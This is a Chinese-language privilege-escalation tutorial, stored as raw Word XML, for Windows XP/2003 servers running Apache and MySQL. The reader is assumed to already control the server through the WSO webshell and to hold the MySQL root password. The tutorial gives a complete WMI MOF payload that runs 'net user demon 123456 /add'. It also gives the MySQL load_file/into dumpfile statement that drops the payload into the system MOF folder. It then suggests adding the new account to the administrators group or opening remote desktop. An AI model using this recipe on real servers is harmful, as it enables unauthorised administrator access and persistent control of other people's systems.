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C8" w:rsidRDefault="002279A6" w:rsidP="002279A6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002279A6">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>mysql数据库</w:t>
      </w:r>
      <w:r w:rsidR="00453339">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>MOF</w:t>
      </w:r>
      <w:r w:rsidRPr="002279A6">
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="44"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>提权</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002279A6" w:rsidRPr="007431C9" w:rsidRDefault="002279A6" w:rsidP="002279A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>适用场景：</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Win</w:t>
      </w:r>
      <w:r w:rsidR="007D3758">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">XP/2003 + </w:t>
      </w:r>
      <w:r w:rsidR="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Apache + </w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>数据库</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002279A6" w:rsidRPr="007431C9" w:rsidRDefault="002279A6" w:rsidP="002279A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>实验条件：已拿下</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，且拿到数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>root</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>账号密码</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002279A6" w:rsidRPr="007431C9" w:rsidRDefault="002279A6" w:rsidP="002279A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>实验效果：普通用户</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>成功创建</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>系统管理员用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002279A6" w:rsidRPr="007431C9" w:rsidRDefault="00EB6DDE" w:rsidP="002279A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>使用的工具：</w:t>
      </w:r>
      <w:r w:rsidR="00E942B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>WSO2017.php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB6DDE" w:rsidRDefault="00EB6DDE" w:rsidP="002279A6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="345005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DE" w:rsidRPr="007431C9" w:rsidRDefault="00EB6DDE" w:rsidP="002279A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>关于</w:t>
      </w:r>
      <w:r w:rsidR="005203D1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>MOF</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>提权：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB6DDE" w:rsidRPr="007431C9" w:rsidRDefault="00EB6DDE" w:rsidP="002279A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Windows </w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>管理规范</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (WMI) </w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>提供了以下三种方法编译到</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> WMI </w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>存储库的托管对象格式</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> (MOF) </w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>文件：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB6DDE" w:rsidRPr="007431C9" w:rsidRDefault="00EB6DDE" w:rsidP="00EB6DDE">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>方法 1： 运行 MOF 文件指定为命令行参数将 Mofcomp.exe 文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB6DDE" w:rsidRPr="007431C9" w:rsidRDefault="00EB6DDE" w:rsidP="00EB6DDE">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>方法 2： 使用 IMofCompiler 接口和 $ CompileFile 方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB6DDE" w:rsidRPr="007431C9" w:rsidRDefault="00EB6DDE" w:rsidP="00EB6DDE">
      <w:pPr>
        <w:pStyle w:val="a5"/>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>方法 3： 拖放到 %SystemRoot%\System32\Wbem\MOF 文件夹的 MOF 文件。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB6DDE" w:rsidRPr="007431C9" w:rsidRDefault="00EB6DDE" w:rsidP="002279A6">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Microsoft </w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>建议您到存储库编译</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> MOF </w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>文件使用前两种方法。也就是运行</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mofcomp.exe </w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>文件，</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>或使用</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> IMofCompiler::CompileFile </w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>方法。第三种方法仅为向后兼容性与早期版本的</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> WMI </w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>提供，并因为此功能可能不会提供在将来的版本后，不应使用。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB6DDE" w:rsidRDefault="007431C9" w:rsidP="002279A6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作步骤：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007431C9" w:rsidRDefault="007431C9" w:rsidP="002279A6"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MOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件，里有大马上传到服务器上，代码如下</w:t>
      </w:r>
    </w:p>
    <w:p w:rsid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#pragma namespace("\\\\.\\root\\subscription")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instance of __EventFilter as</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>$EventFilter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{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EventNamespace = "Root\\Cimv2";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Name  = "filtP2";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Query = "Select * From __InstanceModificationEvent "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        "Where TargetInstance Isa \"Win32_LocalTime\" "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        "And TargetInstance.Second = 5";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QueryLanguage = "WQL";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};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  <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> 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instance of ActiveScriptEventConsumer as</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>$Consumer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{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Name = "consPCSV2";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ScriptingEngine = "JScript";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ScriptText =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"var WSH = new ActiveXObject(\"WScr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>ipt.Shell\")\nWSH.run(\"</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>net.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>demon 123456 /add</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>\")";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};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  <w:szCs w:val="24"/>
        </w:rPr>
        <w:t> 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instance of __FilterToConsumerBinding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{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Consumer   = $Consumer;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    Filter = $EventFilter;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007431C9" w:rsidRPr="007431C9" w:rsidRDefault="007431C9" w:rsidP="007431C9">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007431C9" w:rsidRPr="007431C9" w:rsidRDefault="007431C9">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>加红区字体请自行更改，编写好后保存为</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Demonevt.mof</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，然后里用</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>大马上传</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>该文件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB6DDE" w:rsidRDefault="007431C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060521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C9" w:rsidRDefault="007431C9">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5302668" cy="1880559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95" cy="18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DE" w:rsidRPr="007431C9" w:rsidRDefault="007431C9" w:rsidP="007D3758">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidR="00EB6DDE" w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>WSO</w:t>
      </w:r>
      <w:r w:rsidR="00EB6DDE" w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>大马</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Console</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>模块</w:t>
      </w:r>
      <w:r w:rsidR="00EB6DDE" w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，查看当前存在的用户</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，此时还不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>demon</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB6DDE" w:rsidRDefault="007431C9" w:rsidP="002279A6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1824201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C9" w:rsidRPr="007431C9" w:rsidRDefault="007431C9" w:rsidP="007D3758">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>切换到</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>模块，连接数据库</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>mysql</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，执行下面一条</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>语句</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007431C9" w:rsidRDefault="007431C9" w:rsidP="007D3758">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>select load_file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>("</w:t>
      </w:r>
      <w:r w:rsidRPr="007431C9">
        <w:rPr>
          <w:rFonts w:eastAsia="宋体"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>C:/Inetpub/ftproot/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>Demonevt.mof") into dumpfile "C:/windows/system32/wbem/mof/nullevt.mof"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007431C9" w:rsidRDefault="007431C9" w:rsidP="007431C9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1514444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C9" w:rsidRDefault="007431C9" w:rsidP="007431C9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996023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58" w:rsidRPr="007D3758" w:rsidRDefault="007D3758" w:rsidP="007D3758">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="exact"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007D3758">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>然后再返回查看</w:t>
      </w:r>
      <w:r w:rsidRPr="007D3758">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> net user </w:t>
      </w:r>
      <w:r w:rsidRPr="007D3758">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>，发现成功多出一个</w:t>
      </w:r>
      <w:r w:rsidRPr="007D3758">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>demon</w:t>
      </w:r>
      <w:r w:rsidRPr="007D3758">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>用户</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D3758" w:rsidRDefault="007D3758" w:rsidP="007431C9">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="2851390"/>
            <wp:effectExtent l="19050" t="0" r="254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00" w:rsidRPr="007D3758" w:rsidRDefault="007D3758" w:rsidP="007431C9">
      <w:pPr>
        <w:rPr>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>再利用相同的方法，将</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>MOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>代码中</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>net user</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>换成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> net localgroup </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>加入管理员组即可提权，这里就不继续演示了，同样也可以利用这招写一个开启</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>3389</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>MOF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>代码上传执行，最后连目标即可</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="001C4E00" w:rsidRPr="007D3758" w:rsidSect="00D4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E8" w:rsidRDefault="00452CE8" w:rsidP="00C02549">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00452CE8" w:rsidRDefault="00452CE8" w:rsidP="00C02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E8" w:rsidRDefault="00452CE8" w:rsidP="00C02549">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="1">
    <w:p w:rsidR="00452CE8" w:rsidRDefault="00452CE8" w:rsidP="00C02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65716"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="784A1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545B35"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6E1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15B6C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="45509D22"/>
    <w:lvl w:ilvl="0" w:tplc="110E8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49"/>
    <w:rsid w:val="00061131"/>
    <w:rsid w:val="001412B5"/>
    <w:rsid w:val="001B15C2"/>
    <w:rsid w:val="001C4E00"/>
    <w:rsid w:val="002279A6"/>
    <w:rsid w:val="002C462F"/>
    <w:rsid w:val="00452CE8"/>
    <w:rsid w:val="00453339"/>
    <w:rsid w:val="005203D1"/>
    <w:rsid w:val="0057159B"/>
    <w:rsid w:val="00635FC8"/>
    <w:rsid w:val="007116AE"/>
    <w:rsid w:val="007431C9"/>
    <w:rsid w:val="007D3758"/>
    <w:rsid w:val="00811384"/>
    <w:rsid w:val="00C02549"/>
